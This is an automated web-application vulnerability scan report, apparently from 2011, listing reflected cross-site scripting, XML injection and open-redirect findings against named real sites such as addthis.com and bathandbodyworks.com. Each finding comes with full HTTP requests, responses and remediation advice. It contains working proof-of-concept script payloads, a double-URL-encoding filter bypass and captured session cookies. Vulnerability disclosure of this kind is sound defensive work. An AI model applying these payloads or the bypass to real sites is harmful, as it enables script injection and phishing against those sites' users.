Request

GET /bookmark.php?v=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; ana_svc=cb; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmb=56306477.2.10.1303530430; uid=4dab4fa85facd099; psc=4; _chartbeat2=v6gcvdw86l4w274q
Referer: http://www.google.com/search?hl=en&q=cb105"><script>alert(1)</script>5590ae680b0

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 03:59:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94493

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=cb105"><script>alert(1)</script>5590ae680b0" />
...[SNIP]...

2.139. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2306b%2522%253balert%25281%2529%252f%252f6821fa4840e was submitted in the Referer HTTP header. This input was echoed as 2306b";alert(1)//6821fa4840e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 03:59:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94451

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=2306b%2522%253balert%25281%2529%252f%252f6821fa4840e";addthis_title="2306b";alert(1)//6821fa4840e - 1 search";
var services = { 'naszaklasa':"Nasza-klasa", 'tuenti':"Tuenti", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97a
...[SNIP]...

2.140. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 60542<script>alert(1)</script>d6008797b36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 03:59:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94475

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>d6008797b36";addthis_title="60542<script>alert(1)</script>d6008797b36 - 1 search";
var services = { 'naszaklasa':"Nasza-klasa", 'tuenti':"Tuenti", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97a
...[SNIP]...

2.141. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload fe1d5<script>alert(1)</script>7f1bc67721b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fblog.interop.com%2F&jsref=&rnd=1303527005275 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://blog.interop.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==fe1d5<script>alert(1)</script>7f1bc67721b; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 23 Apr 2011 02:50:41 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==fe1d5<script>alert(1)</script>7f1bc67721b
userid:
</div>
...[SNIP]...

3. XML injection previous next
There are 7 instances of this issue:

http://use.typekit.com/k/ecn3tqz-e.css [REST URL parameter 1]
http://use.typekit.com/k/ecn3tqz-e.css [REST URL parameter 2]
http://www.bathandbodyworks.com/cartHandler/index.jsp [REST URL parameter 2]
http://www.bathandbodyworks.com/coreg/index.jsp [REST URL parameter 2]
http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]
https://www.bathandbodyworks.com/coreg/index.jsp [REST URL parameter 2]
https://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

3.1. http://use.typekit.com/k/ecn3tqz-e.css [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://use.typekit.com
Path:	/k/ecn3tqz-e.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /k]]>>/ecn3tqz-e.css?3bb2a6e53c9684ffdc9a9bf21b5b2a6212c659a382e93df341d51f573423810159ff279be4c812e05a9c584ffe69159c5380bb6ce4ea23421a7b1ae457676fa7e2a968e7a9b895f27a14b3e6ef7c413bd537a0dd43903292e8a1099a7302b09386857a02539633bf39bb2678ad1f5ce7ae9f2bb2f0d6e645a31c39444d0b69cd2e0a0960ec36933e2b72a3b694 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.freethewan.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Sat, 23 Apr 2011 03:31:10 GMT
Expires: Sat, 23 Apr 2011 03:36:10 GMT
Server: EOS (lax001/54D9)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.2. http://use.typekit.com/k/ecn3tqz-e.css [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://use.typekit.com
Path:	/k/ecn3tqz-e.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /k/ecn3tqz-e.css]]>>?3bb2a6e53c9684ffdc9a9bf21b5b2a6212c659a382e93df341d51f573423810159ff279be4c812e05a9c584ffe69159c5380bb6ce4ea23421a7b1ae457676fa7e2a968e7a9b895f27a14b3e6ef7c413bd537a0dd43903292e8a1099a7302b09386857a02539633bf39bb2678ad1f5ce7ae9f2bb2f0d6e645a31c39444d0b69cd2e0a0960ec36933e2b72a3b694 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.freethewan.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Sat, 23 Apr 2011 03:31:15 GMT
Expires: Sat, 23 Apr 2011 03:36:15 GMT
Server: EOS (lax001/54D7)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.3. http://www.bathandbodyworks.com/cartHandler/index.jsp [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.bathandbodyworks.com
Path:	/cartHandler/index.jsp

Issue detail

Request

POST /cartHandler/index.jsp]]>> HTTP/1.1
Host: www.bathandbodyworks.com
Proxy-Connection: keep-alive
Referer: http://www.bathandbodyworks.com/giftCards/gcOptions.jsp?prodCounter=2&cp=2484530.2077137&categoryId=2121240&gc_0=10889079%7C2&gc_1=&gc_2=&gc_3=
Cache-Control: max-age=0
Origin: http://www.bathandbodyworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=J3G1NyYF2DWzb1ns4ybG9pPtT420NCSyyr0vLGXB89yDyyW62QGF!-43060859; browser_id=133166540903; __g_c=w%3A0; cmTPSet=Y; mt.v=1.1493614939.1303533604965; cmRS=&t1=1303533636626&t2=1303533637311&t3=-1&t4=1303533636375&fti=1303533719197&fn=search%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3BUNDEFINED%3A3%3B&ac=1:S&fd=1%3A2%3Ato%3B1%3A3%3Afrom%3B1%3A4%3Amsg%3B1%3A10%3Aaddtobag%3B&uer=&fu=/cartHandler/index.jsp&pi=PRODUCT%3A%20E-Gifts%20%26%20Gift%20Cards%282077137%29&ho=www25.BathAndBodyWorks.com/eluminate%3F&ci=90026971
Content-Length: 389

amount=60&to=sdf+g%40dgs.com&from=532454325%40hllodsss.com&msg=dasfg+safs+df+&amount=&to=&from=&msg=&action_type=addMultiGiftCardsWithAddOn&cartPage=%2FgiftCards%2FgcInterstitial.jsp&errorPage=%2Fgift
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 04:46:14 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107188

<!DOCTYPE html>
<html>
<head>


<link href="http://bbw.imageg.net/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...

3.4. http://www.bathandbodyworks.com/coreg/index.jsp [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.bathandbodyworks.com
Path:	/coreg/index.jsp

Issue detail

Request

GET /coreg/index.jsp]]>>?step=register HTTP/1.1
Host: www.bathandbodyworks.com
Proxy-Connection: keep-alive
Referer: http://www.bathandbodyworks.com/giftCards/gcInterstitial.jsp?cp=2484530.2077137&categoryId=2121240&prodCounter=2&gc_0=10889079%7C2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=J3G1NyYF2DWzb1ns4ybG9pPtT420NCSyyr0vLGXB89yDyyW62QGF!-43060859; browser_id=133166540903; __g_c=w%3A0; cmTPSet=Y; mt.v=1.1493614939.1303533604965; cmRS=&t1=1303533722263&t2=1303533723924&t3=1303533739603&t4=1303533721034&lti=1303533739603&ln=&hr=/coreg/index.jsp%3Fstep%3Dregister&fti=&fn=search%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=&ho=www25.BathAndBodyWorks.com/eluminate%3F&ci=90026971&ul=http%3A//www.bathandbodyworks.com/giftCards/gcInterstitial.jsp%3Fcp%3D2484530.2077137%26categoryId%3D2121240%26prodCounter%3D2%26gc_0%3D10889079%257C2&rf=http%3A//www.bathandbodyworks.com/giftCards/gcOptions.jsp%3FprodCounter%3D2%26cp%3D2484530.2077137%26categoryId%3D2121240%26gc_0%3D10889079%257C2%26gc_1%3D%26gc_2%3D%26gc_3%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 04:43:36 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107197

<!DOCTYPE html>
<html>
<head>


<link href="http://bbw.imageg.net/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...

3.5. http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.bathandbodyworks.com
Path:	/favicon.ico

Issue detail

Request

GET /favicon.ico]]>> HTTP/1.1
Host: www.bathandbodyworks.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=J3G1NyYF2DWzb1ns4ybG9pPtT420NCSyyr0vLGXB89yDyyW62QGF!-43060859; browser_id=133166540903; __g_c=w%3A0; mt.v=1.1493614939.1303533604965; cmTPSet=Y

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 04:40:30 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107187

<!DOCTYPE html>
<html>
<head>


<link href="http://bbw.imageg.net/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...

3.6. https://www.bathandbodyworks.com/coreg/index.jsp [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://www.bathandbodyworks.com
Path:	/coreg/index.jsp

Issue detail

Request

GET /coreg/index.jsp]]>>?step=register HTTP/1.1
Host: www.bathandbodyworks.com
Connection: keep-alive
Referer: https://www.bathandbodyworks.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=J3G1NyYF2DWzb1ns4ybG9pPtT420NCSyyr0vLGXB89yDyyW62QGF!-43060859; browser_id=133166540903; __g_c=w%3A0; cmTPSet=Y; mt.v=1.1493614939.1303533604965; cmRS=&t1=1303533751804&t2=1303533758436&t3=1303533774837&t4=1303533749027&lti=1303533774837&ln=&hr=/coreg/index.jsp%3Fstep%3Dregister&fti=&fn=search%3A0%3BreturningCustomer%3A1%3BnewCustomer%3A2%3BUNDEFINED%3A3%3BUNDEFINED%3A4%3B&ac=&fd=&uer=&fu=&pi=CHECKOUT%3A%20Login&ho=www25.BathAndBodyWorks.com/eluminate%3F&ci=90026971&ul=https%3A//www.bathandbodyworks.com/checkout/index.jsp%3Fprocess%3Dlogin&rf=http%3A//www.bathandbodyworks.com/giftCards/gcInterstitial.jsp%3Fcp%3D2484530.2077137%26categoryId%3D2121240%26prodCounter%3D2%26gc_0%3D10889079%257C2

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 04:45:43 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 109696

<!DOCTYPE html>
<html>
<head>


<link href="/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...

3.7. https://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1] previous

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://www.bathandbodyworks.com
Path:	/favicon.ico

Issue detail

Request

GET /favicon.ico]]>> HTTP/1.1
Host: www.bathandbodyworks.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=J3G1NyYF2DWzb1ns4ybG9pPtT420NCSyyr0vLGXB89yDyyW62QGF!-43060859; browser_id=133166540903; __g_c=w%3A0; cmTPSet=Y; mt.v=1.1493614939.1303533604965

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 04:44:24 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 109686

<!DOCTYPE html>
<html>
<head>


<link href="/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...

4. Open redirection previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bathandbodyworks.com
Path:	/cartHandler/index.jsp

Issue detail

The value of the cartPage request parameter is used to perform an HTTP redirect. The payload http%3a//a905c3f0ccf6ce217/a%3f/giftCards/gcInterstitial.jsp was submitted in the cartPage parameter. This caused a redirection to the following URL:

http://a905c3f0ccf6ce217/a?/giftCards/gcInterstitial.jsp&cp=2484530.2077137&categoryId=2121240&prodCounter=2&gc_0=10889079%7C2

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable viable exploitation in a phishing attack.

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

Request

GET /cartHandler/index.jsp?amount=60&to=sdf+g%40dgs.com&from=532454325%40hllodsss.com&msg=dasfg+safs+df+&amount=&to=&from=&msg=&action_type=addMultiGiftCardsWithAddOn&cartPage=http%3a//a905c3f0ccf6ce217/a%3f/giftCards/gcInterstitial.jsp&errorPage=%2FgiftCards%2FgcOptions.jsp&prodCounter=2&categoryId=2121240&cp=2484530.2077137&parentProd_0=10889079&gcProd_0=2453032%7C3148114&parentProd_1=10889079&gcProd_1=2453032%7C3148114&gc_0=10889079%7C2 HTTP/1.1
Host: www.bathandbodyworks.com
Proxy-Connection: keep-alive
Referer: http://www.bathandbodyworks.com/giftCards/gcOptions.jsp?prodCounter=2&cp=2484530.2077137&categoryId=2121240&gc_0=10889079%7C2&gc_1=&gc_2=&gc_3=
Cache-Control: max-age=0
Origin: http://www.bathandbodyworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=J3G1NyYF2DWzb1ns4ybG9pPtT420NCSyyr0vLGXB89yDyyW62QGF!-43060859; browser_id=133166540903; __g_c=w%3A0; cmTPSet=Y; mt.v=1.1493614939.1303533604965; cmRS=&t1=1303533636626&t2=1303533637311&t3=-1&t4=1303533636375&fti=1303533719197&fn=search%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3BUNDEFINED%3A3%3B&ac=1:S&fd=1%3A2%3Ato%3B1%3A3%3Afrom%3B1%3A4%3Amsg%3B1%3A10%3Aaddtobag%3B&uer=&fu=/cartHandler/index.jsp&pi=PRODUCT%3A%20E-Gifts%20%26%20Gift%20Cards%282077137%29&ho=www25.BathAndBodyWorks.com/eluminate%3F&ci=90026971

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 23 Apr 2011 04:44:03 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Location: http://a905c3f0ccf6ce217/a?/giftCards/gcInterstitial.jsp&cp=2484530.2077137&categoryId=2121240&prodCounter=2&gc_0=10889079%7C2
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 487

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://a905c3f0ccf6ce217/a?/giftCa
...[SNIP]...

Report generated by XSS.CX at Fri Apr 22 23:51:38 CDT 2011.